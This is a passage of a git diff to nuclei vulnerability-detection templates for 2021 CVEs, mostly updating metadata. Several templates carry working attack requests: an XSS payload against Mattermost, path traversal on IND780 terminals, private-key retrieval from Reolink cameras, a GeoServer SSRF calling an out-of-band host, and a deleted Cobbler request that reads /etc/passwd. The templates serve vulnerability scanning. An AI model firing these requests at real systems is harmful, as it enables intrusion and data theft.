200 + - type: word + part: header + words: + - "text/html" + - type: word + part: body + words: + - ">" + - "adsf/js/" + condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-37859.yaml b/nuclei-templates/CVE-2021/CVE-2021-37859.yaml index 0c6287fe0c..cade6b445d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-37859.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-37859.yaml @@ -1,26 +1,21 @@ id: CVE-2021-37859 - info: name: Mattermost XSS author: 0x_Akoko severity: medium description: reflected Cross-Site Scripting (XSS) via the OAuth flow tags: cve,cve2021,xss - requests: - method: GET path: - "{{BaseURL}}/oauth/shielder/mobile_login?redirect_to=%22%3E%3Cimg%20src%3D%22%22%20onerror%3D%22alert(document.domain)%22%3E" - matchers-condition: and matchers: - - type: word words: - "" part: body condition: and - - type: word words: - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-38751.yaml b/nuclei-templates/CVE-2021/CVE-2021-38751.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-38751.yaml rename to nuclei-templates/CVE-2021/CVE-2021-38751.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-39141.yaml b/nuclei-templates/CVE-2021/CVE-2021-39141.yaml index a1f0f72337..d42bbcd990 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39141.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39141.yaml @@ -20,13 +20,13 @@ info: cve-id: CVE-2021-39141 cwe-id: CWE-434 epss-score: 0.25418 - epss-percentile: 0.96209 + epss-percentile: 0.96584 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce + tags: cve,cve2021,xstream,deserialization,rce,xstream_project http: - raw: @@ -230,4 +230,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502200c3f56ed3fb77680c64c84f8e0144049e83349c419a1ee40e5900d3bf364f9e1022100fee9ad730745ae4e3835e510d2649a4808b98cd40f76d70f23c3541f6055b518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022053f0426292580652f55e357f2b98bfc3e5eeb27cdf9a41d9687c48bc8ec58bf7022066c4195bc224aeee315f7711243b2ddb5212f9f4a9a41ac581fd5066d8a9b5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-39144.yaml b/nuclei-templates/CVE-2021/CVE-2021-39144.yaml index a6d7a8c2a8..a19802e392 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39144.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39144.yaml @@ -6,20 +6,29 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. + remediation: | + Upgrade XStream to a version that is not affected by CVE-2021-39144. reference: - https://x-stream.github.io/CVE-2021-39144.html - https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh - https://security.netapp.com/advisory/ntap-20210923-0003/ - https://nvd.nist.gov/vuln/detail/cve-2021-39144 + - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.5 cve-id: CVE-2021-39144 - cwe-id: CWE-94,CWE-502 - epss-score: 0.97284 - tags: cve,cve2021,xstream,deserialization,rce,kev + cwe-id: CWE-306,CWE-502 + epss-score: 0.96272 + epss-percentile: 0.99425 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve2021,cve,xstream,deserialization,rce,kev,xstream_project http: - raw: @@ -78,4 +87,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# Enhanced by cs on 2023/04/17 +# digest: 490a0046304402200e05acfab9074cc5b7b2f6b1f1ba33cf96f6e5fdd55e6e4ff88cea344d39ad3f02205722ce0e0e82affb85fe8a8b2843770329e2cb843008904feebf64127bb7ddc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-39146.yaml b/nuclei-templates/CVE-2021/CVE-2021-39146.yaml index 2777bb081a..6430851191 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39146.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39146.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade XStream to a version that is not affected by CVE-2021-39146. reference: @@ -20,13 +22,13 @@ info: cve-id: CVE-2021-39146 cwe-id: CWE-434 epss-score: 0.27391 - epss-percentile: 0.96308 + epss-percentile: 0.96375 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce + tags: cve2021,cve,xstream,deserialization,rce,xstream_project http: - raw: @@ -117,4 +119,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100d9ed29cd68cd496e6b5c8f4d0e79349e6efc83486ef02d10f786e508ea5e8d20022100e9a1e9b71e9b25547a65b648ed111af54d092566fba5470f275e3c83c7e9ad10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100833e5bcb2f394e9487e537025c26bcfbcc2b936b06eb1849e65851e1d44d86da022100b217b08be73723a93bb1293669baa2cb9859cc6954ad0ac642642a99e07df0d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-39152.yaml b/nuclei-templates/CVE-2021/CVE-2021-39152.yaml index 0e43866740..34ee5c6927 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39152.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39152.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services. remediation: | Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability. reference: @@ -20,13 +22,13 @@ info: cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.01242 - epss-percentile: 0.83916 + epss-percentile: 0.83992 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,ssrf,oast + tags: cve2021,cve,xstream,ssrf,oast,xstream_project http: - raw: @@ -71,4 +73,4 @@ http: part: interactsh_request words: - "User-Agent: Java" -# digest: 4a0a00473045022059d29cf3bbc247bdc5b81ac734f5e39219140f464dcb1a5361b547c8d20cf8dc022100b00b1a84c9f8088abefc22a57068d22f084f19ffa8f6623214f767a2422b7c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066c9ce151ee358bbe8455f9b617c8364fb827e63a620fb317affb71e693de0e102200a11031cf4158ec89817f2f860b0878dd4f93c94685a0e1e5d0a7ce837143d39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-39165.yaml b/nuclei-templates/CVE-2021/CVE-2021-39165.yaml index 72f7374e73..5384a41c12 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39165.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39165.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-39165 cwe-id: CWE-287 - epss-score: 0.06078 - epss-percentile: 0.92723 + epss-score: 0.04786 + epss-percentile: 0.92528 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: chachethq product: cachet shodan-query: http.favicon.hash:-1606065523 - tags: cve,cve2021,cachet,sqli + tags: cve,cve2021,cachet,sqli,chachethq http: - method: GET @@ -45,4 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "pagination") && contains(body, "data")' condition: and -# digest: 4b0a00483046022100e727000c83a5eef402d4e172072111f605d1cc83482747edb572d3a8ae5b5c3e022100d88b907d2624f9f8a4572c5d5c344a47219a824c3f6dc5368d2b63bf6997d29c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204b3206034be2f774b8b91870d6386c1beadd44650a52a79e394ef377b8fd8a7e022100be385f84a4f30de70a9f03f2813758d984dbe67e2d2ddbdf8ffb06f772ea2772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-39211.yaml b/nuclei-templates/CVE-2021/CVE-2021-39211.yaml deleted file mode 100644 index 482d40423b..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39211.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-39211 - -info: - name: GLPI 9.2/<9.5.6 - Information Disclosure - author: dogasantos,noraj - severity: medium - description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - reference: - - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 - - https://github.com/glpi-project/glpi/releases/tag/9.5.6 - - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 - remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-39211 - cwe-id: CWE-668,CWE-200 - tags: cve,cve2021,glpi,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/ajax/telemetry.php" - - "{{BaseURL}}/glpi/ajax/telemetry.php" - - matchers-condition: and - matchers: - - type: word - words: - - '"uuid":' - - '"glpi":' - condition: and - - - type: status - status: - - 200 - -# Enhanced by md on 2023/02/01 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39322.yaml b/nuclei-templates/CVE-2021/CVE-2021-39322.yaml index 1974b6aa52..02e75158ab 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39322.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39322.yaml @@ -1,21 +1,36 @@ id: CVE-2021-39322 info: - name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting + name: WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting author: dhiyaneshDK severity: medium - description: "The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path." + description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. + remediation: | + Update to the latest version of the WordPress Easy Social Icons Plugin (3.0.9) or apply the vendor-provided patch to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 - https://nvd.nist.gov/vuln/detail/CVE-2021-39322 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 + - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-39322 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated - -requests: + epss-score: 0.00234 + epss-percentile: 0.60718 + cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: cybernetikz + product: easy_social_icons + framework: wordpress + tags: cve,cve2021,wordpress,wp-plugin,authenticated,wpscan,cybernetikz + +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -25,12 +40,10 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -38,13 +51,12 @@ requests: words: - '' - - type: status - status: - - 200 - - type: word part: header words: - "text/html" -# Enhanced by mp on 2022/03/23 + - type: status + status: + - 200 +# digest: 4b0a00483046022100e9ee15a8abada7958e711aded015c8de9683c68642039c6bafcd88ef1ddceddf022100842ffd37deba2b63b5a7b9547f566896c8a2aa1054e7cc68f4d01ba1058be6e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-39433.yaml b/nuclei-templates/CVE-2021/CVE-2021-39433.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39433.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39433.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-40149.yaml b/nuclei-templates/CVE-2021/CVE-2021-40149.yaml index 9d9700aaaf..22c1d83310 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40149.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40149.yaml @@ -1,9 +1,8 @@ id: CVE-2021-40149 - info: name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure author: For3stCo1d - severity: medium + severity: high description: | Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. reference: @@ -11,20 +10,15 @@ info: - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 cve-id: CVE-2021-40149 - cwe-id: CWE-552 metadata: shodan-query: http.title:"Reolink" verified: "true" tags: cve,cve2021,reolink,camera,iot,exposure,unauth - requests: - method: GET path: - "{{BaseURL}}/self.key" - matchers-condition: and matchers: - type: word @@ -32,7 +26,6 @@ requests: - "-----BEGIN RSA PRIVATE KEY-----" - "-----END RSA PRIVATE KEY----" condition: and - - type: status status: - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40150.yaml b/nuclei-templates/CVE-2021/CVE-2021-40150.yaml new file mode 100644 index 0000000000..7c25b1aef3 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-40150.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-40150 +info: + name: Reolink E1 Zoom Camera - Information Disclosure + author: For3stCo1d + severity: medium + description: | + The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. + An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations. + reference: + - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt + - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150 + classification: + cve-id: CVE-2021-40150 + metadata: + verified: true + shodan-query: http.title:"Reolink" + tags: cve,cve2021,reolink,camera,exposure,iot +requests: + - method: GET + path: + - "{{BaseURL}}/conf/nginx.conf" + matchers-condition: and + matchers: + - type: word + words: + - "server" + - "listen" + - "fastcgi" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40323.yaml b/nuclei-templates/CVE-2021/CVE-2021-40323.yaml deleted file mode 100644 index 77e64baeb8..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40323.yaml +++ /dev/null @@ -1,99 +0,0 @@ -id: CVE-2021-40323 - -info: - name: Cobbler <3.3.0 Remote Code Execution - severity: critical - author: c-sh0 - description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method. - reference: - - https://github.com/cobbler/cobbler/releases/tag/v3.3.0 - - https://github.com/cobbler/cobbler/issues/2795 - - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-40323 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-40323 - cwe-id: CWE-94 - tags: cve,cve2021,cobbler,rce - -requests: - - raw: - - | - POST {{BaseURL}}/cobbler_api HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - - - - find_profile - - - - - - name - - * - - - - - - - - - - | - POST {{BaseURL}}/cobbler_api HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - - - - generate_script - - - - {{profile}} - - - - - - - - - - /etc/passwd - - - - - - extractors: - - type: regex - name: profile - internal: true - group: 1 - regex: - - '(.*?)' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'text/xml' - - - type: regex - regex: - - "root:.*:0" - - "bin:.*:1" - - "nobody:.*:99" - condition: or - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40661.yaml b/nuclei-templates/CVE-2021/CVE-2021-40661.yaml index bf86ea439c..c1fffcff14 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40661.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40661.yaml @@ -6,23 +6,34 @@ info: severity: high description: | IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the system. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks. reference: - https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661 - https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm - https://nvd.nist.gov/vuln/detail/CVE-2021-40661 + - https://github.com/Live-Hack-CVE/CVE-2021-40661 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-40661 cwe-id: CWE-22 + epss-score: 0.01137 + epss-percentile: 0.84411 + cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:* metadata: - google-query: inurl:excalweb.dll + verified: true + max-request: 1 + vendor: mt + product: ind780_firmware shodan-query: IND780 - verified: "true" - tags: cve,cve2021,ind780,lfi + google-query: inurl:excalweb.dll + tags: cve2021,cve,ind780,lfi,mt -requests: +http: - method: GET path: - "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini" @@ -39,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4b0a00483046022100b7e2b1761ea31f96096ee954d371b91df663bcfa45c8f773a58b8f5f509c9e11022100a7cd7929229cc6298d1bd75e2f8a31d62e513dfae2e7c5fc750a14a9a971e44c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40822.yaml b/nuclei-templates/CVE-2021/CVE-2021-40822.yaml index cb5258cfc8..bb7e248c57 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40822.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40822.yaml @@ -1,59 +1,42 @@ id: CVE-2021-40822 - info: name: Geoserver - Server-Side Request Forgery - author: For3stCo1d,aringo-bf + author: For3stCo1d severity: high description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. - remediation: | - Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability. reference: - https://gccybermonks.com/posts/cve-2021-40822/ - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3 - https://github.com/geoserver/geoserver/releases - https://nvd.nist.gov/vuln/detail/CVE-2021-40822 - - https://osgeo-org.atlassian.net/browse/GEOS-10229 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-40822 cwe-id: CWE-918 - epss-score: 0.68366 - epss-percentile: 0.97892 - cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: osgeo - product: geoserver - shodan-query: title:"GeoServer" fofa-query: app="GeoServer" - tags: cve2021,cve,ssrf,geoserver,osgeo - -http: + verified: "true" + tags: cve,cve2021,ssrf,geoserver +requests: - raw: - | POST /geoserver/TestWfsPost HTTP/1.1 - Host: oast.pro + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password= - + form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password= matchers-condition: and matchers: - type: word - part: body + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "Interactsh" - + - "http" - type: word - part: header words: - - "text/html" - + - "" - type: status status: - 200 -# digest: 4a0a0047304502210097677b11bc4965e4caadab5f77264e9a0e4a19a059a4c5e5269a6aff5c98b76e022015b1d85cb9b06c62a60bfe3cf6f89fb25cc22fb593d23eb92e858bc117b5b1a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40908.yaml b/nuclei-templates/CVE-2021/CVE-2021-40908.yaml index c2cc98fac2..9fdb9e476a 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40908.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40908.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40908 cwe-id: CWE-89 - epss-score: 0.02031 - epss-percentile: 0.87677 + epss-score: 0.0161 + epss-percentile: 0.8612 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system - tags: cve,cve2021,sqli,purchase-order,poms + tags: cve2021,cve,sqli,purchase-order,poms,purchase_order_management_system_project http: - raw: @@ -44,4 +46,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"incorrect\"")' condition: and -# digest: 4a0a00473045022020c0e0e367267c415cde4d2d7bf034c4c380c33da6c258aca5ba577dbe2846b4022100b8b166f606dd0b7f8fb37762e0c2599b524c9986a71ceeb98d2a18c5b5a733b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6f6b36eba8496c9a593169aab8d1c95a86ab766f8a7b6ff30f96d2d5d78e45b022054ee34ff5a00ffd01500719d1a15661146d35eb17a7224a0a24f38c5519de6bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40968.yaml b/nuclei-templates/CVE-2021/CVE-2021-40968.yaml index 2e1276f60e..6e545de39b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40968.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40968.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40968 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.50482 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: @@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cb1467e19ec91d0e8c659d9f8d7af32d19b915a3c3edc56b49054f9804ef2c56022100c7afc228ec95811ae51a35552c2ce7c5018b92d63e597f996f3da83532275b5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206dba6a431dc30930ad050e7f834b22acc257437f9ac33a3d996fcc702e3aa15802205f6714478f7cfa16218ab6510bd7d4dd9093ad29ce7722c5b0e8a4fee8aa45f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40969.yaml b/nuclei-templates/CVE-2021/CVE-2021-40969.yaml index 35c7920035..3c7e768608 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40969.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40969.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40969 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.51305 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: @@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220343caf4ff44121d860f70a36cddef3e458db41be865e23088b2e0979a270e4f802210086c4ee3aa1846c4212779b5236c4f1c62191a176917beb12d8ee502f7521013c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207085af68079243c3f162206c08f5bfc2c11e35d92aa24107a9a989d42674176e022100c72473d3a42f86cc061bb8fec67780356ca1769c35fa52f444ff3316f6674779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40970.yaml b/nuclei-templates/CVE-2021/CVE-2021-40970.yaml index 2e0cac0301..43da6c18c3 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40970.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40970.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40970 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.50482 cpe: 